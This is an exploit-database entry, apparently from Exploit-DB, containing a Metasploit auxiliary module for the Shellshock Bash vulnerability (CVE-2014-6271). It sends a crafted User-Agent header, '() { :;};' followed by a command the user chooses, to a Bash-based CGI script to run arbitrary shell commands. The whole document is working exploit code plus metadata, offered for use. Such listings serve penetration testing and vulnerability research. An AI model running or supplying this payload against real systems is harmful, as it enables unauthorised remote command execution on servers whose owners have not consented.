GNU Bash - Environment Variable Command Injection (Metasploit)
Author: Shaun Colley type: remote platform: cgi port: date_added: 2014-09-25 date_updated: 2014-09-25 verified: 1 codes: CVE-2014-7910;OSVDB-112004;CVE-2014-7227;CVE-2014-7196;CVE-2014-7169;CVE-2014-62771;CVE-2014-6271;CVE-2014-3671;CVE-2014-3659 tags: Metasploit Framework (MSF) aliases: screenshot_url: application_url: raw file: 34777.rb
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'bashedCgi',
'Description' => %q{
Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command.
},
'Author' =>
[
'Stephane Chazelas', # vuln discovery
'Shaun Colley <scolley at ioactive.com>' # metasploit module
],
'License' => MSF_LICENSE,
'References' => [ 'CVE', '2014-6271' ],
'Targets' =>
[
[ 'cgi', {} ]
],
'DefaultTarget' => 0,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' => { 'PAYLOAD' => 0 }
))
register_options(
[
OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),
OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])
], self.class)
end
def run
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['TARGETURI'],
'agent' => "() { :;}; " + datastore['CMD']
})
if res && res.code == 200
print_good("Command sent - 200 received")
else
print_error("Command sent - non-200 reponse")
end
end
end